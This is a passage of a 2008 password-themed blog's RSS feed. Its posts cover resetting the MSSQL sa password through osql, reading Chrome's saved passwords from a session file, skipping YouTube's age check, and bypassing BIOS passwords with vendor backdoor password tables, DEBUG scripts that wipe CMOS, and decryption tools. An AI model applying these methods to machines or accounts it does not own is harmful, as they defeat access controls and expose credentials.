			<content:encoded><![CDATA[<p>SA is the administrative login for the MSSQL. To Change the MSSQL SA password please use following steps:</p>
<p>Step 1. Go to the command prompt of the server ( Start &gt;&gt; Run &gt;&gt; Cmd ) and type in command</p>
<pre>osql –L</pre>
<p><a href="http://www.whatsmypass.com/wp-content/uploads/2008/10/list1.png"><img class="aligncenter size-medium wp-image-328" title="list1" src="http://www.whatsmypass.com/wp-content/uploads/2008/10/list1-300x148.png" alt="" width="300" height="148" /></a><br />
This command will list all the MSSQL servers near you.</p>
<p>Step 2. Copy full name of required MSSQL server and type</p>
<pre>osql -S copied_servername –E</pre>
<p><a href="http://www.whatsmypass.com/wp-content/uploads/2008/10/enter.png"><img class="aligncenter size-medium wp-image-331" title="enter" src="http://www.whatsmypass.com/wp-content/uploads/2008/10/enter-300x148.png" alt="" width="300" height="148" /></a><br />
By this command you’ll connect to MSSQL server using Server administrator account (Windows Authentication).</p>
<p>Step 3. To change sa password you should execute the following query:</p>
<pre>1&gt; sp_password NULL,’new_password’,’sa’
2&gt; go</pre>
<p><a href="http://www.whatsmypass.com/wp-content/uploads/2008/10/change.png"><img class="aligncenter size-medium wp-image-330" title="change" src="http://www.whatsmypass.com/wp-content/uploads/2008/10/change-300x148.png" alt="" width="300" height="148" /></a><br />
Here the new_password will be the password which you want to set.</p>
<p>Now try to login to MSSQL using new password.</p>
<p>Another quick way:</p>
<pre>OSQL -S MyServer -E -Q "EXEC sp_defaultdb 'sa', 'master'"
OSQL -S MyServer -E -Q "EXEC sp_password NULL, 'NewPassword', 'sa'"</pre>
]]></content:encoded>
			<wfw:commentRss>http://www.whatsmypass.com/change-mssql2005-password-from-command-prompt/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Google Clear-Text passwords</title>
		<link>http://www.whatsmypass.com/google-clear-text-passwords</link>
		<comments>http://www.whatsmypass.com/google-clear-text-passwords#comments</comments>
		<pubDate>Mon, 06 Oct 2008 11:52:35 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[Google]]></category>
		<category><![CDATA[News]]></category>
		<category><![CDATA[Password Info]]></category>
		<category><![CDATA[windows]]></category>
		<category><![CDATA[Administrator]]></category>
		<category><![CDATA[C]]></category>
		<category><![CDATA[Chrome]]></category>
		<category><![CDATA[Microsoft Vista]]></category>
		<category><![CDATA[webmail.pair.com]]></category>

		<guid isPermaLink="false">http://www.whatsmypass.com/?p=275</guid>
		<description><![CDATA[Chrome stores saves passwords in CLEAR TEXT. 1 ] Go to any site that allows you to sign in ex. webmail.pair.com 2 ] Enter your fake username. Enter a false (incorrect) password 3 ] Allow Chrome to save password ( It will prompt below the address bar) 4 ] Close Chrome 5 ] Locate and [...]]]></description>
			<content:encoded><![CDATA[<p>Chrome stores saves passwords in CLEAR TEXT.</p>
<p>1 ] Go to any site that allows you to sign in ex. webmail.pair.com</p>
<p>2 ] Enter your fake username. Enter a false (incorrect) password</p>
<p>3 ] Allow Chrome to save password ( It will prompt below the address bar)</p>
<p>4 ] Close Chrome</p>
<p>5 ] Locate and change directory using the command prompt to the path below</p>
<p>%:\Documents and Settings\%user name%\Local Settings\Application Data\Google\Chrome\User Data\Default\Current Session ( Path might be different in Vista )</p>
<p>6 ] Note that the &#8220;Current Session&#8221; file needs to be present in your<br />
&#8220;\Application Data\Google\Chrome\User Data\Default\&#8221; directory</p>
<p>7 ] Type this command in cmd : find &#8220;&#038;secret&#8221; &#8220;Current Session&#8221;</p>
<p>8 ] You can see that its stored in clear text.<br />
example:<br />
C:\Documents and Settings\Administrator\Local Settings\Application Data\Google\C<br />
hrome\User Data\Default>find &#8220;&#038;secret&#8221; &#8220;Current Session&#8221;</p>
<pre>
---------- CURRENT SESSION
login_username=FakeUser&#038;secretkey=FakePass&#038;x=18&#038;y=8B</pre>
<p></P></p>
<p>Need to secure your usb drive? <a href="http://xillwillx.securestix.hop.clickbank.net/?tid=1" target="_top">Click Here!</a>  </p>
]]></content:encoded>
			<wfw:commentRss>http://www.whatsmypass.com/google-clear-text-passwords/feed</wfw:commentRss>
		<slash:comments>3</slash:comments>
		</item>
		<item>
		<title>Bypass Youtube Age Verification Signup</title>
		<link>http://www.whatsmypass.com/bypass-youtube-age-verification-signup</link>
		<comments>http://www.whatsmypass.com/bypass-youtube-age-verification-signup#comments</comments>
		<pubDate>Mon, 06 Oct 2008 11:01:21 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[News]]></category>
		<category><![CDATA[Uncategorized]]></category>
		<category><![CDATA[Administrator]]></category>
		<category><![CDATA[United States]]></category>
		<category><![CDATA[VerifyAge]]></category>
		<category><![CDATA[youtube]]></category>

		<guid isPermaLink="false">http://www.whatsmypass.com/?p=257</guid>
		<description><![CDATA[This firefox extension simply checks if the URL you&#8217;ve just opened contains YouTube&#8217;s VerifyAge-page. If it does, it&#8217;ll grab the video-ID of the video-clip you just tried to watch and open up a popup-window with that video &#8211; WITHOUT having to login / register. Youtube uses a flag system that allows users to report videos [...]]]></description>
			<content:encoded><![CDATA[<p>This firefox extension simply checks if the URL you&#8217;ve just opened contains YouTube&#8217;s VerifyAge-page. If it does, it&#8217;ll grab the video-ID of the video-clip you just tried to watch and open up a popup-window with that video &#8211; WITHOUT having to login / register.<br />
<span id="more-257"></span><br />
Youtube uses a flag system that allows users to report videos as inappropriate which according to Youtube means any violation of the Youtube terms of service. A flagged video will be reviewed by an administrator who has numerous options at hand including setting the flag for age verification which requires users to login before they can view the video.</p>
<p>The greatest thing is: Once you&#8217;ve reached the end of the video and the list of related videos is offered to you, you can simply navigate these videos and watch them in the popup-window without having to navigate to the VerifyAge-page again. So: Open ONE restricted video &#8211; Then watch them ALL!<br />
<a href="https://addons.mozilla.org/en-US/firefox/addon/9128">https://addons.mozilla.org/en-US/firefox/addon/9128</a></p>
]]></content:encoded>
			<wfw:commentRss>http://www.whatsmypass.com/bypass-youtube-age-verification-signup/feed</wfw:commentRss>
		<slash:comments>3</slash:comments>
		</item>
		<item>
		<title>How to Bypass BIOS Passwords</title>
		<link>http://www.whatsmypass.com/how-to-bypass-bios-passwords</link>
		<comments>http://www.whatsmypass.com/how-to-bypass-bios-passwords#comments</comments>
		<pubDate>Sun, 07 Sep 2008 02:39:26 +0000</pubDate>
		<dc:creator>Dev Team</dc:creator>
				<category><![CDATA[Apple]]></category>
		<category><![CDATA[BIOS]]></category>
		<category><![CDATA[Linux]]></category>
		<category><![CDATA[Password Info]]></category>
		<category><![CDATA[Uncategorized]]></category>
		<category><![CDATA[windows]]></category>
		<category><![CDATA[Administrator]]></category>
		<category><![CDATA[AMI BIOS]]></category>
		<category><![CDATA[Backdoor Passwords   Many]]></category>
		<category><![CDATA[CMOS chip]]></category>
		<category><![CDATA[CMP]]></category>
		<category><![CDATA[Compaq]]></category>
		<category><![CDATA[decryption tool]]></category>
		<category><![CDATA[Dell]]></category>
		<category><![CDATA[Dell Biostar Biostar Compaq Compaq Enox]]></category>
		<category><![CDATA[DELL RD230  Remote Control]]></category>
		<category><![CDATA[desktop systems]]></category>
		<category><![CDATA[IBM]]></category>
		<category><![CDATA[IBM Aptiva BIOS Press]]></category>
		<category><![CDATA[Microsoft Windows]]></category>
		<category><![CDATA[MOV AX]]></category>
		<category><![CDATA[MS- DOS]]></category>
		<category><![CDATA[Phoenix]]></category>
		<category><![CDATA[Q]]></category>
		<category><![CDATA[Siemens]]></category>
		<category><![CDATA[supervisor]]></category>
		<category><![CDATA[Toshiba]]></category>

		<guid isPermaLink="false">http://www.whatsmypass.com/?p=78</guid>
		<description><![CDATA[BIOS passwords can be add extra layer of security for desktop and laptop computers, and are used to either prevent a user from changing the BIOS settings or to prevent the PC from booting without a password. BIOS passwords can also be a liability if a user forgot their passwords, or if a malicious user [...]]]></description>
			<content:encoded><![CDATA[<p>BIOS passwords can be add extra layer of security for desktop and laptop computers, and are used to either prevent a user from changing the BIOS settings or to prevent the PC from booting without a password. BIOS passwords can also be a liability if a user forgot their passwords, or if a malicious user changes the password. Sending the unit back to the manufacturer to have the BIOS reset can be expensive and is usually not covered in an a typical warranty. However, there are a few known backdoors and other tricks of the trade that can be used to bypass or reset the BIOS password on most systems.<br />
<span id="more-78"></span></p>
<p>To <span style="font-family: arial,helvetica;"><span style="font-family: arial,helvetica;"><span style="font-family: arial,helvetica;">enter the BIOS Setup try these keystrokes:</span></span></span></p>
<p><span style="font-family: arial,helvetica;"><span style="font-family: arial,helvetica;"><span style="font-family: arial,helvetica;"></p>
<ul>
<li> AMI BIOS:  Del key during the POST</li>
<li> DTK BIOS:  Esc key during the POST</li>
<li> Award BIOS:  Ctrl-Alt-Esc</li>
<li> misc BIOS:  Ctrl-Esc</li>
<li> Phoenix BIOS:  Ctrl-Alt-Esc or Ctrl-Alt-S</li>
<li> IBM PS/2 BIOS:  Ctrl-Alt-Ins after Ctrl-Alt-Del</li>
</ul>
<p></span></span></span></p>
<h4><span style="color: #00ff00;">Backdoor Passwords</span></h4>
<p>Many BIOS manufacturers have provided backdoor passwords that can be used to access the BIOS setup in the event you have lost your password. These passwords are case sensitive, so you may wish to try a variety of combinations.</p>
<p><span style="color: #ff3300;">WARNING:</span> Some BIOS configurations will lock you out of the system completely if you type in an incorrect password more than 3 times. Read your manufacturers documentation for the BIOS setting before you begin typing in passwords.</p>
<h4><span style="color: #00ff00;">Award BIOS backdoor passwords:</span></h4>
<table border="0" align="center">
<tbody>
<tr>
<td>ALFAROME</td>
<td width="30"></td>
<td>BIOSTAR</td>
<td width="30"></td>
<td>KDD</td>
<td width="30"></td>
<td>ZAAADA</td>
</tr>
<tr>
<td>ALLy</td>
<td width="30"></td>
<td>CONCAT</td>
<td width="30"></td>
<td>Lkwpeter</td>
<td width="30"></td>
<td>ZBAAACA</td>
</tr>
<tr>
<td>aLLy</td>
<td width="30"></td>
<td>CONDO</td>
<td width="30"></td>
<td>LKWPETER</td>
<td width="30"></td>
<td>ZJAAADC</td>
</tr>
<tr>
<td>aLLY</td>
<td width="30"></td>
<td>Condo</td>
<td width="30"></td>
<td>PINT</td>
<td width="30"></td>
<td>01322222</td>
</tr>
<tr>
<td>ALLY</td>
<td width="30"></td>
<td>d8on</td>
<td width="30"></td>
<td>pint</td>
<td width="30"></td>
<td>589589</td>
</tr>
<tr>
<td>aPAf</td>
<td width="30"></td>
<td>djonet</td>
<td width="30"></td>
<td>SER</td>
<td width="30"></td>
<td>589721</td>
</tr>
<tr>
<td>_award</td>
<td width="30"></td>
<td>HLT</td>
<td width="30"></td>
<td>SKY_FOX</td>
<td width="30"></td>
<td>595595</td>
</tr>
<tr>
<td>AWARD_SW</td>
<td width="30"></td>
<td>J64</td>
<td width="30"></td>
<td>SYXZ</td>
<td width="30"></td>
<td>598598</td>
</tr>
<tr>
<td>AWARD?SW</td>
<td width="30"></td>
<td>J256</td>
<td width="30"></td>
<td>syxz</td>
<td width="30"></td>
<td></td>
</tr>
<tr>
<td>AWARD SW</td>
<td width="30"></td>
<td>J262</td>
<td width="30"></td>
<td>shift + syxz</td>
<td width="30"></td>
<td></td>
</tr>
<tr>
<td>AWARD PW</td>
<td width="30"></td>
<td>j332</td>
<td width="30"></td>
<td>TTPTHA</td>
<td width="30"></td>
<td></td>
</tr>
<tr>
<td>AWKWARD</td>
<td width="30"></td>
<td>j322</td>
<td width="30"></td>
<td></td>
<td width="30"></td>
<td></td>
</tr>
<tr>
<td>awkward</td>
<td width="30"></td>
<td></td>
<td width="30"></td>
<td></td>
<td width="30"></td>
<td></td>
</tr>
</tbody>
</table>
<h4><span style="color: #00ff00;">AMI BIOS Backdoor Passwords:</span></h4>
<table border="0" align="center">
<tbody>
<tr>
<td>AMI</td>
<td width="30"></td>
<td>BIOS</td>
<td width="30"></td>
<td>PASSWORD</td>
<td width="30"></td>
<td>HEWITT RAND</td>
</tr>
<tr>
<td>AMI?SW</td>
<td width="30"></td>
<td>AMI_SW</td>
<td width="30"></td>
<td>LKWPETER</td>
<td width="30"></td>
<td>CONDO</td>
</tr>
</tbody>
</table>
<h4><span style="color: #00ff00;">Phoenix BIOS Backdoor Passwords:</span></h4>
<table border="0" align="center">
<tbody>
<tr>
<td>phoenix</td>
<td width="30"></td>
<td>PHOENIX</td>
<td width="30"></td>
<td>CMOS</td>
<td width="30"></td>
<td>BIOS</td>
</tr>
</tbody>
</table>
<h4><span style="color: #00ff00;">Misc. Common Passwords</span></h4>
<table border="0" align="center">
<tbody>
<tr>
<td>ALFAROME</td>
<td width="30"></td>
<td>BIOSTAR</td>
<td width="30"></td>
<td>biostar</td>
<td width="30"></td>
<td>biosstar</td>
</tr>
<tr>
<td>CMOS</td>
<td width="30"></td>
<td>cmos</td>
<td width="30"></td>
<td>LKWPETER</td>
<td width="30"></td>
<td>lkwpeter</td>
</tr>
<tr>
<td>setup</td>
<td width="30"></td>
<td>SETUP</td>
<td width="30"></td>
<td>Syxz</td>
<td width="30"></td>
<td>Wodj</td>
</tr>
</tbody>
</table>
<h4><span style="color: #00ff00;">Other BIOS Passwords by Manufacturer</span></h4>
<table border="0" align="center">
<tbody>
<tr>
<th>Manufacturer</th>
<th>Password</th>
</tr>
<tr>
<td></td>
<td></td>
</tr>
<tr>
<td>VOBIS &amp; IBM</td>
<td>merlin</td>
</tr>
<tr>
<td>Dell</td>
<td>Dell</td>
</tr>
<tr>
<td>Biostar</td>
<td>Biostar</td>
</tr>
<tr>
<td>Compaq</td>
<td>Compaq</td>
</tr>
<tr>
<td>Enox</td>
<td>xo11nE</td>
</tr>
<tr>
<td>Epox</td>
<td>central</td>
</tr>
<tr>
<td>Freetech</td>
<td>Posterie</td>
</tr>
<tr>
<td>IWill</td>
<td>iwill</td>
</tr>
<tr>
<td>Jetway</td>
<td>spooml</td>
</tr>
<tr>
<td>Packard Bell</td>
<td>bell9</td>
</tr>
<tr>
<td>QDI</td>
<td>QDI</td>
</tr>
<tr>
<td>Siemens</td>
<td>SKY_FOX</td>
</tr>
<tr>
<td>TMC</td>
<td>BIGO</td>
</tr>
<tr>
<td>Toshiba</td>
<td>Toshiba</td>
</tr>
</tbody>
</table>
<h4><span style="color: #00ff00;">Toshiba BIOS</span></h4>
<p>Most Toshiba laptops and some desktop systems will bypass the BIOS password if the left shift key is held down during boot</p>
<h4><span style="color: #00ff00;">IBM Aptiva BIOS</span></h4>
<p>Press both mouse buttons repeatedly during the boot</p>
<h4><span style="color: #00ff00;">Motherboard &#8220;Clear CMOS&#8221; Jumper or Dipswitch settings</span></h4>
<p>Many motherboards feature a set of jumpers or dipswitches that will clear the CMOS and wipe all of the custom settings including BIOS passwords. The locations of these jumpers / dipswitches will vary depending on the motherboard manufacturer and ideally you should always refer to the motherboard or computer manufacturers documentation. If the documentation is unavailable, the jumpers/dipswitches can sometimes be found along the edge of the motherboard, next to the CMOS battery, or near the processor. Some manufacturers may label the jumper / dipswitch CLEAR &#8211; CLEAR CMOS &#8211; CLR &#8211; CLRPWD &#8211; PASSWD &#8211; PASSWORD &#8211; PWD. On laptop computers, the dipswitches are usually found under the keyboard or within a compartment at the bottom of the laptop.</p>
<p>Please remember to unplug your PC and use a grounding strip before reaching into your PC and touching the motherboard. Once you locate and rest the jumper switches, turn the computer on and check if the password has been cleared. If it has, turn the computer off and return the jumpers or dipswitches to its original position.</p>
<h4><span style="color: #00ff00;">Removing the CMOS Battery</span></h4>
<p>The CMOS settings on most systems are buffered by a small battery that is attached to the motherboard. (It looks like a small watch battery). If you unplug the PC and remove the battery for 10-15 minutes, the CMOS may reset itself and the password should be blank. (Along with any other machine specific settings, so be sure you are familiar with manually reconfiguring the BIOS settings before you do this.) Some manufacturers backup the power to the CMOS chipset by using a capacitor, so if your first attempt fails, leave the battery out (with the system unplugged) for at least 24 hours. Some batteries are actually soldered onto the motherboard making this task more difficult. Unsoldering the battery incorrectly may damage your motherboard and other components, so please don&#8217;t attempt this if you are inexperienced. Another option may be to remove the CMOS chip from the motherboard for a period of time.</p>
<p>Note: Removing the battery to reset the CMOS will not work for all PC&#8217;s, and almost all of the newer laptops store their BIOS passwords in a manner which does not require continuous power, so removing the CMOS battery may not work at all. IBM Thinkpad laptops lock the hard drive as well as the BIOS when the supervisor password is set. If you reset the BIOS password, but cannot reset the hard drive password, you may not be able to access the drive and it will remain locked, even if you place it in a new laptop. IBM Thinkpads have special jumper switches on the motherboard, and these should be used to reset the system.</p>
<h4><span><span style="color: #00ff00;">Use the Debug command </span></span></h4>
<p>Boot to MS- DOS prompt, run through the below example, this                   example is perfectly fine to run on any PC Computer running MS-DOS / Windows and will not                   harm anything.</p>
<p><span style="font-family: arial,helvetica;"><span style="font-family: arial,helvetica;"><span style="font-family: arial,helvetica;"><span style="font-family: arial,helvetica;"><span style="font-family: arial,helvetica;"><span style="font-family: arial,helvetica;"><span style="font-family: arial,helvetica;"><span style="font-family: arial,helvetica;"><span style="font-family: arial,helvetica;">DEBUG script that will just reset the password only</span></span></span></span></span></span></span></span></span></p>
<p>Type <strong>debug</strong> and press enter.   (ex.  A:\&gt;debug )</p>
<p>After typing debug you will get &#8220;-&#8221; as a prompt ,type these exactly how they are written.</p>
<p>o 70 10<br />
o 71 20<br />
quit</p>
<p>Explanation of code:</p>
<p><span style="font-family: arial,helvetica;"><span style="font-family: arial,helvetica;"><span style="font-family: arial,helvetica;"><span style="font-family: arial,helvetica;"><span style="font-family: arial,helvetica;"> DEBUG     ; Run DEBUG, &#8220;-&#8221; will appear on each line then type:<br />
o 70 20     ; Send 70 to address 18<br />
o 71 21     ; Send 71 to address FF<br />
q              ; Quit DEBUG</span></span></span></span></span></p>
<p><span style="font-family: arial,helvetica;"><span style="font-family: arial,helvetica;"><span style="font-family: arial,helvetica;"><span style="font-family: arial,helvetica;"><span style="font-family: arial,helvetica;"><span style="font-family: arial,helvetica;"><span style="font-family: arial,helvetica;"><span style="font-family: arial,helvetica;"><span style="font-family: arial,helvetica;">or you can use this alternate DEBUG script that will just reset the the BIOS<br />
</span></span></span></span></span></span></span></span></span></p>
<p>A <strong>&lt;ENTER&gt;</strong><br />
MOV AX,0 <strong>&lt;ENTER&gt; </strong><br />
MOV AX,CX <strong>&lt;ENTER&gt;</strong><br />
OUT 70,AL <strong>&lt;ENTER&gt;</strong><br />
MOV AX,0 <strong>&lt;ENTER&gt;</strong><br />
OUT 71,AL <strong>&lt;ENTER&gt;</strong><br />
INC CX <strong>&lt;ENTER&gt; </strong><br />
CMP CX,100 <strong>&lt;ENTER&gt; </strong><br />
JB 103 <strong>&lt;ENTER&gt; </strong><br />
INT 20 <strong>&lt;ENTER&gt; </strong><br />
<strong>&lt;ENTER&gt;</strong> Note: <em>Nothing is typed on this line </em><br />
G <strong>&lt;ENTER&gt;</strong> <em>By pressing G this will execute the above script</em><br />
Q <strong>&lt;ENTER&gt;</strong></p>
<p>Then reboot and you will get a Setup Checksum Error. Go into setup, correct all the           incorrect values, time, date&#8230;</p>
<p><span style="font-family: arial,helvetica;"><span style="font-family: arial,helvetica;"><span style="font-family: arial,helvetica;"><span style="font-family: arial,helvetica;"><span style="font-family: arial,helvetica;"><span style="font-family: arial,helvetica;"><span style="font-family: arial,helvetica;"><span style="font-family: arial,helvetica;"><span style="font-family: arial,helvetica;"><br />
</span></span></span></span></span></span></span></span></span></p>
<p>Alternatively you can use the program <a href="http://geocities.com/sjwoolham/freeware/wcmos12.zip">WipeCMOS</a> from a boot floppy</p>
<h4><span><span><span style="color: #00ff00;">Use the Decoding software</span></span></span></h4>
<p><a href="http://www.cgsecurity.org/cmospwd-5.0.zip">CmosPwd </a>by CGSecurity &#8211; This is probably the most up to date and popular CMOS decryption tool. CmosPwd decrypts password stored in cmos used to access BIOS SETUP, you can also backup, restore and erase/kill cmos.You will have to be logged in as administrator, run ioperm -i command and then run cmospwd_win.exe</p>
<p><a href="http://www.pcdisktools.com/download/PCCMOSCleaner.iso">PC CMOS Cleaner</a> &#8211; PC CMOS Cleaner is an easy-to-use tool to recover, delete, decode and display the superior passwords stored in BIOS whatever the brand is. It’s an bootable CD that runs on x86 and x86_64 computers. It can display the superior passwords of the BIOS, remove BIOS password(will set the BIOS to default status, need reset date).</p>
]]></content:encoded>
			<wfw:commentRss>http://www.whatsmypass.com/how-to-bypass-bios-passwords/feed</wfw:commentRss>
		<slash:comments>8</slash:comments>
		</item>
	</channel>
</rss>

